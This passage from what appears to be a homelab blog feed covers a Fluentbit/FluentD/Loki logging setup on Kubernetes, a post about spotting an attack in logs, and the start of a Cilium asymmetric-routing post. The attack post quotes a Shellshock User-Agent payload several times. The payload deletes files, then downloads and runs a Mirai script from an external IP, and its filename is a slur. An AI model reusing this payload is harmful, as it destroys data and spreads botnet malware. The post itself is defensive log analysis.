</span></span><span style="display:flex;"><span>  <span style="color:#f92672">filters</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [FILTER]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name kubernetes
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Merge_Log On
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Keep_Log Off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        K8S-Logging.Parser On
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        K8S-Logging.Exclude On
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Annotations off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [FILTER]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name nest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Operation lift
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Nested_under kubernetes
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [FILTER]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name    modify
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match   kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Remove pod_id
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Remove docker_id
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Remove container_hash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Remove container_image
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [FILTER]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name    grep
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match   kube.*
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Exclude namespace_name fluentd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">outputs</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    [OUTPUT]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Name          forward
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Match         *
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Tag           services.$namespace_name.$container_name
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Host          fluentd.fluentd.svc.cluster.local
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Port          24230
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Retry_Limit   50</span>
</span></span></code></pre></div><p>At the top is the <a href="https://docs.fluentbit.io/manual/pipeline/inputs/tail">tail input</a>.
It reads all the log files in <code>/var/log/containers</code>, which is mounted into the
Fluentbit container from the host. I&rsquo;ve set the parser to <code>cri</code>, as that&rsquo;s the
format cri-o writes.</p>
<p>The first and most interesting filter is <a href="https://docs.fluentbit.io/manual/pipeline/filters/kubernetes">Kubernetes</a>.
This plugin first extracts some data from the tag, namely the namespace, Pod name,
container name and container id. This is taken from the filename by the tail
plugin. A log file for a cilium pod would look like this:
<code>cilium-tmlqp_kube-system_cilium-agent-eb472a8bae2b95836acc51f70986c7bd2f659f0d69e4aff8b9f9fa80fef5d565.log</code>.
Here, <code>cilium-tmlqp</code> is the Pod name, <code>kube-system</code> the Namespace, <code>cilium-agent</code>
the container name, and the trailing hash is the container ID.</p>
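<p>To make that a bit more concrete, here is roughly what happens for that file (the field names are taken from the filter&rsquo;s
defaults as I understand them, so treat this as an illustration):</p>
<pre tabindex="0"><code># The &#39;*&#39; in &#39;Tag kube.*&#39; is replaced with the file path, with &#39;/&#39; turned into &#39;.&#39;:
kube.var.log.containers.cilium-tmlqp_kube-system_cilium-agent-eb472a8bae2b95836acc51f70986c7bd2f659f0d69e4aff8b9f9fa80fef5d565.log

# From that tag, the Kubernetes filter derives:
pod_name       = cilium-tmlqp
namespace_name = kube-system
container_name = cilium-agent
docker_id      = eb472a8bae2b95836acc51f70986c7bd2f659f0d69e4aff8b9f9fa80fef5d565
</code></pre>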
<p>But the Kubernetes filter can extract additional data, by contacting the
kube-apiserver. These are the Pod ID, labels and annotations. In my config, I&rsquo;ve
disabled the annotations, because I don&rsquo;t find them too interesting in logging.
The labels, on the other hand, might come in handy.
One important thing to note about the Kubernetes filter: It needs to get this
additional data from the kube-apiserver. There&rsquo;s some caching, and I&rsquo;ve not found
any increased load on my kube-apiserver. But depending on how busy a cluster is,
meaning how many new pods appear in any given timeframe, the load on the kube-apiserver
might go pretty high.</p>
<p>The Kubernetes filter puts all of the keys it adds under a <code>kubernetes</code> key. I
don&rsquo;t find that particularly useful. That&rsquo;s why I raise all keys under <code>kubernetes</code>
by one level with the <code>nest</code> filter.</p>
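<p>Roughly, that turns a record of this shape into the flat form shown further below (an abbreviated illustration, not actual output):</p>
<pre tabindex="0"><code># Before the nest filter:
log=&gt;&#34;...&#34;, stream=&gt;&#34;stderr&#34;,
kubernetes=&gt;{
  pod_name=&gt;&#34;rook-discover-d9tcf&#34;,
  namespace_name=&gt;&#34;rook-ceph&#34;,
  container_name=&gt;&#34;rook-discover&#34;,
  labels=&gt;{...},
  host=&gt;&#34;khepri&#34;
}

# After &#39;Operation lift&#39; with &#39;Nested_under kubernetes&#39;:
log=&gt;&#34;...&#34;, stream=&gt;&#34;stderr&#34;,
pod_name=&gt;&#34;rook-discover-d9tcf&#34;,
namespace_name=&gt;&#34;rook-ceph&#34;,
container_name=&gt;&#34;rook-discover&#34;,
labels=&gt;{...},
host=&gt;&#34;khepri&#34;
</code></pre>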
<p>With the <code>modify</code> filter I&rsquo;m also removing some pieces of the log info I deem
superfluous in my log records.</p>
<p>The final filter, <code>grep</code>, is immensely important for a stable and useful
FluentD+Fluentbit setup. Imagine the following scenario: For debugging purposes,
you use FluentD&rsquo;s <a href="https://docs.fluentd.org/filter/stdout">stdout filter</a>, which
does nothing other than write an entire log record to the stdout of the FluentD
container. Now, if we were collecting the FluentD log file and feeding it back
into FluentD, that would also then be output on stdout again - ad infinitum.
This is the end result:
<figure>
    <img loading="lazy" src="fluentd-log-loop.png"
         alt="A screenshot of a terminal, completely filled with &#39;/&#39;. Nothing else. No, really. I&#39;m not being lazy here. Just an entire terminal, filled with &#39;/&#39;."/> <figcaption>
            <p>An endless loop.</p>
        </figcaption>
</figure>

And of course, I&rsquo;ve got a screenshot of it. This has happened to me every single
time I have set up FluentD.
But this doesn&rsquo;t mean that we can&rsquo;t have FluentD logs. I will explain how that
works without risking an endless loop in the next section.</p>
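<p>For illustration, the debugging filter that triggers this is as simple as it gets (a sketch; any tag pattern will do):</p>
<pre tabindex="0"><code>&lt;filter services.**&gt;
  @type stdout
&lt;/filter&gt;
</code></pre>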
<p>The OUTPUT part then transfers the logs to FluentD. I&rsquo;m setting the tag as the
Namespace name and the container name. These make the most sense as identifiers
from the data I have. I would have loved to also add the Pod name as another
key, but this has a problem: The Pod name as provided might have some hashes
attached. E.g. for the Cilium pod example from before, the Pod name would be
<code>cilium-tmlqp</code>. This hash changes when the Pod spec changes. While this is a
good idea to uniquely identify Pods, it isn&rsquo;t too useful for logs. Because
generally speaking, when looking at logs, I&rsquo;m interested in the logs for a
specific app, not (necessarily?) of a specific Pod from that app.
In addition, these unique identifiers also later form the labels for Loki, and
labels with too high cardinality are bad for Loki&rsquo;s performance.</p>
<h1 id="setting-up-k8s-component-logs">Setting up k8s component logs</h1>
<p>Before finishing up, I would also like to show what my k8s log handling looks
like in FluentD. As described above, the logs from the k8s containers arrive
in FluentD via the Forward protocol. The tag defined in the Fluentbit OUTPUT
section arrives untouched in the following <code>&lt;source&gt;</code>:</p>
<pre tabindex="0"><code>&lt;source&gt;
  @type forward
  port {{ .Values.ports.k8sLogs }}
  bind 0.0.0.0
  @label @K8S
&lt;/source&gt;
</code></pre><p>This source just ensures that all log records are routed to the <code>K8S</code> label.
A log, when it arrives at FluentD, looks like this:</p>
<pre tabindex="0"><code>time=&gt;&#34;2024-02-12T18:44:35.624186596+01:00&#34;,
stream=&gt;&#34;stderr&#34;,
_p=&gt;&#34;F&#34;,
log=&gt;&#34;2024-02-12 17:44:35.624124 I | sys: Device found - mmcblk0boot1&#34;,
pod_name=&gt;&#34;rook-discover-d9tcf&#34;,
namespace_name=&gt;&#34;rook-ceph&#34;,
labels=&gt;{
  app=&gt;&#34;rook-discover&#34;,
  app.kubernetes.io/component=&gt;&#34;rook-discover&#34;,
  app.kubernetes.io/created-by=&gt;&#34;rook-ceph-operator&#34;,
  app.kubernetes.io/instance=&gt;&#34;rook-discover&#34;,
  app.kubernetes.io/managed-by=&gt;&#34;rook-ceph-operator&#34;,
  app.kubernetes.io/name=&gt;&#34;rook-discover&#34;,
  app.kubernetes.io/part-of=&gt;&#34;rook-ceph-operator&#34;,
  controller-revision-hash=&gt;&#34;799f867d7&#34;,
  pod-template-generation=&gt;&#34;3&#34;,
  rook.io/operator-namespace=&gt;&#34;rook-ceph&#34;
},
host=&gt;&#34;khepri&#34;,
container_name=&gt;&#34;rook-discover&#34;
</code></pre><p>The only thing I&rsquo;m touching in FluentD is the <code>log</code> key. My goal is to extract
two pieces of information from it: the actual log message and, first and foremost,
the severity level of the log. And let me tell you: the latter is <em>wild</em>. Because not only can the tech industry
not agree on a log format - no, it can&rsquo;t even agree on universal identifiers
for different log levels!</p>
<p>To extract the proper log line, I have separate <a href="https://docs.fluentd.org/filter/parser">Parser filters</a>
in my config, for each individual app. Because yes, it&rsquo;s the Wild West out there
when it comes to logging formats. Even <em>within the same app</em>! &#x1f620;</p>
<p>The above example is from a Ceph container. It would be parsed by this
config:</p>
<pre tabindex="0"><code>&lt;filter services.{rook-cluster,rook-ceph}.{watch-active,provision,rook-ceph-operator,rook-discover}&gt;
  @type parser
  key_name log
  reserve_data true
  remove_key_name_field true
  &lt;parse&gt;
    @type multi_format
    &lt;pattern&gt;
      format regexp
      expression /^(?&lt;logtime&gt;[0-9\-]+ [0-9\:\.]+) (?&lt;level&gt;[^ ]+) \| (?&lt;cmd&gt;[^:]+)\: (?&lt;msg&gt;.*)$/
      time_key logtime
      time_format %F %T.%N
      utc true
    &lt;/pattern&gt;
    &lt;pattern&gt;
      format regexp
      expression /^(?&lt;msg&gt;.*)$/
      time_key nil
    &lt;/pattern&gt;
  &lt;/parse&gt;
&lt;/filter&gt;
</code></pre><p>As you can see, this format is used by a number of other Ceph containers as well.
But you can also see: Besides these well-formatted lines, there are also others
which defy any formatting and hence just get a generic <code>.*</code> regex. And don&rsquo;t
be fooled: There are five other sections just like this one, just to parse logs
from all the Ceph Rook containers running in my cluster.</p>
<p>So what&rsquo;s happening here, exactly? First of all, there&rsquo;s the tag capture at the
top. This determines which logs are handled by this filter. In my logs, the
tags have the format <code>services.NAMESPACE.CONTAINER</code>. The <code>key_name</code> provides
the record key the parser should look at. <code>reserve_data true</code> tells the parser
to leave all other fields in the record untouched. <code>remove_key_name_field true</code>
says that the parser should remove the <code>log</code> field from the record when parsing
was successful. If parsing fails, the record is left completely untouched.
I&rsquo;m using a multi_format parser here, as the containers spit out logs in
multiple formats. Then I choose the <code>regexp</code> parser and provide a regex to
parse the <code>log</code> content.
I can very warmly recommend <a href="https://regex101.com">https://regex101.com</a>. It has
served me very well, both during this migration, and ever since I&rsquo;ve started
using FluentD in the Homelab.
One note on the named capture groups in the regexes: Those are transformed into
additional keys in the record.
Then there&rsquo;s the time handling. As whatever log lib the Ceph containers are using
here is too cool to use <a href="https://en.wikipedia.org/wiki/ISO_8601">ISO8601</a>, I
need to not only specify in which key the time can be found, but also need to
define a format.
This can also be skipped, as seen in the second <code>pattern</code> section. In this case,
the time the record was originally received by Fluentbit is used.</p>
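<p>To make that concrete, here is how the first pattern splits the <code>log</code> value from the Rook example record above:</p>
<pre tabindex="0"><code># 2024-02-12 17:44:35.624124 I | sys: Device found - mmcblk0boot1
logtime =&gt; 2024-02-12 17:44:35.624124   (consumed as the record&#39;s time via time_key/time_format)
level   =&gt; I
cmd     =&gt; sys
msg     =&gt; Device found - mmcblk0boot1
</code></pre>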
<p>Now, back to defining log levels. Here&rsquo;s the config I use to align to a single
identifier for each log level:</p>
<pre tabindex="0"><code>&lt;filter parsed.services.**&gt;
  @type record_modifier

  &lt;replace&gt;
      key level
      expression /^(crit|CRIT|ALERT|alert|4)$/
      replace critical
  &lt;/replace&gt;
  &lt;replace&gt;
      key level
      expression /^(ERROR|eror|ERR|err|E|3)$/
      replace error
  &lt;/replace&gt;
  &lt;replace&gt;
      key level
      expression /^(DEBUG|dbg|DBG|0|\.|\-)$/
      replace debug
  &lt;/replace&gt;
  &lt;replace&gt;
      key level
      expression /^(INFO|Info|INF|inf|I|NOTICE|1|\*)$/
      replace info
  &lt;/replace&gt;
  &lt;replace&gt;
      key level
      expression /^(WARN|warn|WRN|wrn|W|WARNING|2|\#)$/
      replace warning
  &lt;/replace&gt;
&lt;/filter&gt;
</code></pre><p>Note, in particular, the <code>./-/*/#</code>. That&rsquo;s Redis&rsquo; wild way of defining log
severity. See also <a href="https://build47.com/redis-log-format-levels/">this blog post</a>.</p>
<p>Why? Why can&rsquo;t we define one format? I&rsquo;m not asking for a unified log format
at this point. But perhaps - perhaps we can at least have unified identifiers
for the levels?
And also, please: Every single log line should have a severity attached. That&rsquo;s
just basic, good engineering.</p>
<p>One last thing to consider: How to find out whether a log line slipped through
unparsed? For this, I&rsquo;m employing a <a href="https://docs.fluentd.org/output/rewrite_tag_filter">rewrite_tag_filter</a>:</p>
<pre tabindex="0"><code>&lt;match services.**&gt;
  @type rewrite_tag_filter
  &lt;rule&gt;
    key log
    pattern /^.+$/
    tag unparsed.${tag}
  &lt;/rule&gt;
  &lt;rule&gt;
    key log
    pattern /^.+$/
    tag parsed.${tag}
    invert true
  &lt;/rule&gt;
&lt;/match&gt;
</code></pre><p>This filter comes after all the different <code>parser</code> filters. So when, at this
point, a log record still has the <code>log</code> key, it means none of the <code>parser</code>
filters was applied to it. These then get <code>unparsed</code> added to their tag.
There is one important point about <code>rewrite_tag_filter</code>: It re-emits the log
record. So the record runs through the entire chain of filters again. This
can easily lead to an endless loop. Imagine I only added the <code>unparsed</code> tag
to unparsed logs, but left parsed logs completely untouched, instead of
prepending their tag with <code>parsed</code>. Then, the parsed records would start the
filter chain again, completely unchanged - and run into this <code>rewrite_tag_filter</code>
again! And then again. And again. Producing a nice endless loop. So when using
a <code>rewrite_tag_filter</code>, always remember to make sure that you change the tags
on <em>all</em> log lines which might hit them.</p>
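<p>For the Rook example record from above, with tag <code>services.rook-ceph.rook-discover</code>, this means:</p>
<pre tabindex="0"><code># Tag as it arrives from Fluentbit:
services.rook-ceph.rook-discover
# If a parser matched (the &#39;log&#39; key was removed):
parsed.services.rook-ceph.rook-discover
# If no parser matched (the &#39;log&#39; key is still present):
unparsed.services.rook-ceph.rook-discover
</code></pre>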
<p>These <code>unparsed</code> records then go into a <a href="https://docs.fluentd.org/filter/record_transformer">record_transformer</a>
filter:</p>
<pre tabindex="0"><code>  &lt;filter unparsed.**&gt;
    @type record_transformer
    enable_ruby true
    renew_record true
    &lt;record&gt;
      unparsed-log ${record}
      namespace_name hl-dummy
      container_name hl-unparsed-logs
      fluentd-tag ${tag}
      level warn
    &lt;/record&gt;
  &lt;/filter&gt;
</code></pre><p>Here I&rsquo;m putting the entire unparsed log into a subkey <code>unparsed-log</code>. This
also shows off the flexibility of FluentD in manipulating log records. I&rsquo;m also
adding a hardcoded namespace and container name, as those two keys are later
used by Loki to index logs. I&rsquo;m also using them in Grafana for filtering.
And so with this setup, I just need to look at the <code>hl-dummy/hl-unparsed-logs</code>
logs to see whether there are any new unparsed logs, or whether perhaps an older regex
needs adapting to a newer format.</p>
<p>And finally, just for completeness&rsquo; sake, the output to Loki:</p>
<pre tabindex="0"><code>&lt;match {parsed,unparsed}.services.**&gt;
    @type loki
    url &#34;http://loki.loki.svc.cluster.local:3100&#34;
    extra_labels {&#34;job&#34;:&#34;k8s-logs&#34;}
    &lt;label&gt;
        namespace $[&#34;namespace_name&#34;]
        container $[&#34;container_name&#34;]
    &lt;/label&gt;
    &lt;buffer namespace_name,container_name&gt;
        path /fluentd/log/buffers/loki.k8s.*.buffer
        @include loki-buffers.conf
    &lt;/buffer&gt;
&lt;/match&gt;
</code></pre><p>The <code>loki-buffers.conf</code> file has the same content as in the syslog example
above.</p>
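<p>Meaning it presumably contains the buffer options already shown there, minus the <code>path</code>, which is set outside the include here:</p>
<pre tabindex="0"><code>@type file
total_limit_size 5GB
flush_at_shutdown true
flush_mode interval
flush_interval 5s
chunk_limit_size 5MB
</code></pre>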
<h1 id="conclusion">Conclusion</h1>
<p>And that&rsquo;s it! My logging stack, completely migrated to k8s. This was the first
service I actually migrated, and where I could remove jobs from Nomad, namely
the FluentD and Loki jobs. The Nomad cluster now only runs its own Fluentbit job, which
transfers the logs to the FluentD instance running on k8s.</p>
<p>One thing I&rsquo;ve noted for the future: Start actively monitoring the logs.
I had a slightly panicky Sunday morning due to some malicious bash code showing
up in my logs when I went to check whether everything had worked.
<a href="https://blog.mei-home.net/posts/sunday-morning-panic/">Read all about it.</a>
I just so happened to see that log because it happened to be at the very top
when I opened my logging dashboard. Otherwise, I would have completely overlooked
it.</p>
<p>The last thing to do for this migration is to have a look at the unparsed logs
in a week or so and make sure I haven&rsquo;t forgotten anything.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Sunday Morning Panic</title>
      <link>https://blog.mei-home.net/posts/sunday-morning-panic/</link>
      <pubDate>Sun, 11 Feb 2024 11:37:46 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/sunday-morning-panic/</guid>
      <description>My laziness caught up with me</description>
      <content:encoded><![CDATA[<p>I just had a slight Sunday morning panic. I finished my logging setup yesterday
night, and had a look at my FluentD logs this morning to see whether I got any
errors or unparsed logs.</p>
<p>At the very top of the logs, I got this entry:</p>
<pre tabindex="0"><code>error=&#34;#&lt;Fluent::Plugin::Parser::ParserError: pattern not matched with data
&#39;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\&#34;,
\&#34;time\&#34;:\&#34;2024-02-11T04:54:25+01:00\&#34;}&#39;&gt;&#34;
location=
tag=services.traefik.traefik.docker.anon
time=1707623665
record=&#34;{
    \&#34;log\&#34;=&gt;\&#34;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\\\&#34;,
    \\\&#34;time\\\&#34;:\\\&#34;2024-02-11T04:54:25+01:00\\\&#34;
    }\&#34;,
\&#34;logsubstream\&#34;=&gt;\&#34;docker\&#34;,
\&#34;nomad_job_id\&#34;=&gt;\&#34;traefik\&#34;,
\&#34;nomad_task_name\&#34;=&gt;\&#34;traefik\&#34;,
\&#34;nomad_node_name\&#34;=&gt;\&#34;anon\&#34;}&#34;
message=&#34;dump an error event: error_class=Fluent::Plugin::Parser::ParserError
error=\&#34;pattern not matched with data &#39;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\\\&#34;,
\\\&#34;time\\\&#34;:\\\&#34;2024-02-11T04:54:25+01:00\\\&#34;}&#39;\&#34;
location=nil
tag=\&#34;services.traefik.traefik.docker.anon\&#34;
time=2024-02-11 03:54:25.149520221 +0000
record={\&#34;log\&#34;=&gt;\&#34;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\\\&#34;,
\\\&#34;time\\\&#34;:\\\&#34;2024-02-11T04:54:25+01:00\\\&#34;}\&#34;,
\&#34;logsubstream\&#34;=&gt;\&#34;docker\&#34;,
\&#34;nomad_job_id\&#34;=&gt;\&#34;traefik\&#34;,
\&#34;nomad_task_name\&#34;=&gt;\&#34;traefik\&#34;,
\&#34;nomad_node_name\&#34;=&gt;\&#34;anon\&#34;}&#34;
host=anon level=warning
</code></pre><p>That looked suspicious, to say the least. After some googling for the <code>nigga.sh</code>
file, I landed on <a href="https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days">this page from Akamai</a>.
It describes an attack by the Mirai botnet.</p>
<p>What mostly got me into a panic was that this didn&rsquo;t look like a normal Traefik
access log line - in those, a lot of weird stuff gets tried all the time. Instead, the log line in the
Traefik log from Loki looked like this:</p>
<pre tabindex="0"><code>log=&#34;{ :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;\&#34;,\&#34;time\&#34;:\&#34;2024-02-11T04:54:25+01:00\&#34;}&#34; nomad_node_name=anon level=NA
</code></pre><p>So it looked like a normal log entry, not coming from Traefik itself, but still
from the Traefik container. I was already running through some &ldquo;Nuke it all&rdquo;
scenarios in my head.</p>
<p>Then I looked at the Traefik log file itself and relaxed a little bit, as this
showed just a normal Traefik log, with the malicious bash code in the User Agent:</p>
<pre tabindex="0"><code>2024-02-11T04:54:25.148844046+01:00 stdout F {
&#34;ClientAddr&#34;:&#34;185.224.128.10:60474&#34;,
&#34;ClientHost&#34;:&#34;185.224.128.10&#34;,
&#34;ClientPort&#34;:&#34;60474&#34;,
&#34;ClientUsername&#34;:&#34;-&#34;,
&#34;DownstreamContentSize&#34;:19,
&#34;DownstreamStatus&#34;:404,
&#34;Duration&#34;:245663,
&#34;GzipRatio&#34;:0,
&#34;OriginContentSize&#34;:0,
&#34;OriginDuration&#34;:0,
&#34;OriginStatus&#34;:0,
&#34;Overhead&#34;:245663,
&#34;RequestAddr&#34;:&#34;300.300.300.300&#34;,
&#34;RequestContentSize&#34;:0,
&#34;RequestCount&#34;:439872,
&#34;RequestHost&#34;:&#34;300.300.300.300&#34;,
&#34;RequestMethod&#34;:&#34;GET&#34;,
&#34;RequestPath&#34;:&#34;/cgi-bin/jarrewrite.sh&#34;,
&#34;RequestPort&#34;:&#34;-&#34;,&#34;RequestProtocol&#34;:&#34;HTTP/1.1&#34;,
&#34;RequestScheme&#34;:&#34;https&#34;,
&#34;RetryAttempts&#34;:0,
&#34;StartLocal&#34;:&#34;2024-02-11T04:54:25.148079151+01:00&#34;,
&#34;StartUTC&#34;:&#34;2024-02-11T03:54:25.148079151Z&#34;,
&#34;TLSCipher&#34;:&#34;TLS_CHACHA20_POLY1305_SHA256&#34;,
&#34;TLSVersion&#34;:&#34;1.3&#34;,
&#34;entryPointName&#34;:&#34;foo&#34;,
&#34;level&#34;:&#34;info&#34;,
&#34;msg&#34;:&#34;&#34;,
&#34;request_User-Agent&#34;:&#34;() { :; }; echo ; /bin/bash -c &#39;rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh&#39;&#34;,
&#34;time&#34;:&#34;2024-02-11T04:54:2 5+01:00&#34;
}
</code></pre><p>This made a lot more sense to me and was way less scary. But there was still
this nagging thought: Why was I only seeing the malicious User Agent content in
my aggregated logs?</p>
<p>Here the slight worry started returning: My Traefik logs are pushed through a
JSON parser in my FluentD config. Could that parser have executed the lines
somehow&hellip;?
But luckily, no. I was just lazy in the Fluentbit setup which collects the logs
from the Traefik log file on my bastion host and sends them to FluentD. The
config looks like this:</p>
<pre tabindex="0"><code>[PARSER]
    Name podman-traefik
    Format regex
    Regex ^.* (?&lt;log&gt;\{.*\})$
</code></pre><p>And with this regex, exactly the malicious bash code gets extracted from the above
log line as the <code>log</code> content for sending to FluentD. That&rsquo;s why I was only seeing
the bash code in my aggregated logs, instead of the full Traefik access log.</p>
<p>I fixed the issue by changing the regex to this:</p>
<pre tabindex="0"><code>Regex ^[^\ ]* [^\ ]* [A-Z] (?&lt;log&gt;\{.*\})$
</code></pre><p>With that change, the Traefik Podman logs are parsed properly, with the Podman
prefix removed and the remaining JSON from Traefik itself being sent on to
FluentD.</p>
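<p>Spelled out, with the Podman log line having the shape <code>TIMESTAMP STREAM F {...JSON...}</code>, the two regexes behave
like this (my reading of it, for illustration):</p>
<pre tabindex="0"><code># Old: ^.* (?&lt;log&gt;\{.*\})$
#   The greedy .* runs up to the last &#39; {&#39; in the line. With the malicious
#   User-Agent, that &#39;{&#39; sits inside the JSON itself, so only the tail of it,
#   starting at &#39;{ :; };&#39;, ends up in the log field.
# New: ^[^\ ]* [^\ ]* [A-Z] (?&lt;log&gt;\{.*\})$
#   Anchors on exactly &#39;timestamp stream F &#39; and captures the complete
#   JSON object that Traefik wrote.
</code></pre>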
<p>One important thing that this made me realize: I only found this suspicious log
line because I happened to look at the logs at just the right time, so that it
was the most recent line for the FluentD logs. If I had looked sometime later
today, perhaps after another FluentD restart, I would have never seen it. Looks
like I will need to finally tackle that &ldquo;Have a look at Alertmanager&rdquo; task which
has been sitting in the middle of my task list for a long time now.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 2b: Asymmetric Routing</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-2b-asymmetric-routing/</link>
      <pubDate>Sun, 04 Feb 2024 23:00:00 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-2b-asymmetric-routing/</guid>
      <description>Problems with Cilium BGP and the OPNsense firewall</description>
      <content:encoded><![CDATA[<p>Wherein I ran into some problems with the Cilium BGP routing and firewalls on
my OPNsense box.</p>
<p>This is the second addendum for Cilium load balancing in my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>While working on my <a href="https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/">S3 bucket migration</a>,
I ran into several rather weird problems. After switching my internal wiki over to
using the Ceph RGW S3 from my k8s Ceph Rook cluster, I found that the final
upload of the generated site to the S3 bucket from which it was served did not work, even though I had all the necessary
firewall rules configured. The output I was getting looked like this:</p>
<pre tabindex="0"><code>WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 3 sec...
WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 6 sec...
WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 9 sec...
WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 12 sec...
WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 15 sec...
ERROR: S3 Temporary Error: Request failed for: /.  Please try again later.
</code></pre><p>I initially thought that something was wrong with the Rook setup here, but this
didn&rsquo;t seem to be the case - uploading something to a test bucket from my C&amp;C
host worked fine. Same for uploads from my workstation.
Before going on, let me show you a small networking diagram:
<figure>
    <img loading="lazy" src="packet-flow.svg"
         alt="A network diagram. It shows three host. The first one has the name &#39;k8s host 1&#39;. This host has an internal interface labeled with &#39;Ceph S3 address: 10.86.55.100&#39;, with an external interface &#39;Host IP: 10.86.5.xx&#39;. The second host is labeled &#39;Nomad Host: Runs CI&#39;, with a single interface labeled &#39;Host IP: 10.86.5.xx&#39;, same as the previous host. Finally, there is the &#39;OPNsense Firewall&#39; host. It shows a single interface labeled &#39;Homelab VLAN interface&#39;. There are arrows going from the &#39;CI host&#39; to the firewall, on to the k8s host&#39;s host interface and finally into the S3 interface. In the other direction goes a pair of red arrows, out of the S3 interface, into the hosts external interface and from there directly into the Nomad host&#39;s external interface - without a detour via the router."/> <figcaption>
            <p>Perfect example of asymmetric routing.</p>
        </figcaption>
</figure>
</p>
<p>This is a picture-perfect example of asymmetric routing. The S3 service is
announced via a LoadBalancer service and Cilium&rsquo;s BGP functionality. All my
LoadBalancer services are in a separate subnet from the hosts themselves.
So to reach the S3 service, all packets need to go through the OPNsense box.</p>
<p>This is obviously not ideal, as the uplink to the router&rsquo;s interface now becomes
a bottleneck. This could in theory be fixed by using L2 announcements instead,
but those put a pretty high load on the k8s control plane nodes, because they use
k8s leases. And the load scales with the number of hosts in the k8s cluster.</p>
<p>But in this particular case, the problem is asymmetric routing. The Nomad host
running the CI jobs trying to access the S3 buckets will use the LoadBalancer
IP, accessing the Ceph RGW through my Traefik ingress. This IP is in a different
subnet than the hosts, and hence the packets go through the default gateway,
which is my OPNsense box. There, they are routed to the next hop, which is the
k8s node currently running my ingress. From there, they&rsquo;re finally routed
internally to the Ceph RGW pod.</p>
<p>But on the return path for the response packets, they go directly from the
host running the RGW pod to the host running the CI job. This is due to the fact
that both hosts are in the same subnet.</p>
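<p>A quick way to see this asymmetry from the client&rsquo;s side is to ask the kernel
which route it would pick for each destination. A hypothetical check (the node IP
10.86.5.20 is just an illustration, not one of my actual hosts) could look like this:</p>
<pre tabindex="0"><code># The S3 LoadBalancer IP from the diagram is only reachable via the default
# gateway, which is the OPNsense box
ip route get 10.86.55.100
# The k8s node itself is in the same subnet as the client, so reply traffic
# can go host-to-host without ever touching the router
ip route get 10.86.5.20
</code></pre>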
<p>The first consequence of this is the need to change the firewall rules for
accessing the Traefik ingress LoadBalancer service IP from the Homelab.
Initially, my rule used the default state tracking setting. But in this case,
that does not work. The firewall will see the initial TCP SYN packet coming
from the CI job host, but it won&rsquo;t see the SYN/ACK coming back from the ingress,
because that reply is sent directly from host to host, not via the router.
Seeing only one side of the connection, the firewall blocks subsequent
packets.</p>
<p>The solution to this is to change the way OPNsense tracks connections for
the specific rule allowing access to the ingress from the Homelab VLAN. This can
be done in the rule&rsquo;s options, under &ldquo;Advanced features&rdquo;:
<figure>
    <img loading="lazy" src="sloppy.png"
         alt="A screenshot of part of the OPNsense firewall rule configuration. A dropdown besides the label &#39;State Type&#39; is visible, with the entry &#39;sloppy state&#39; selected."/> <figcaption>
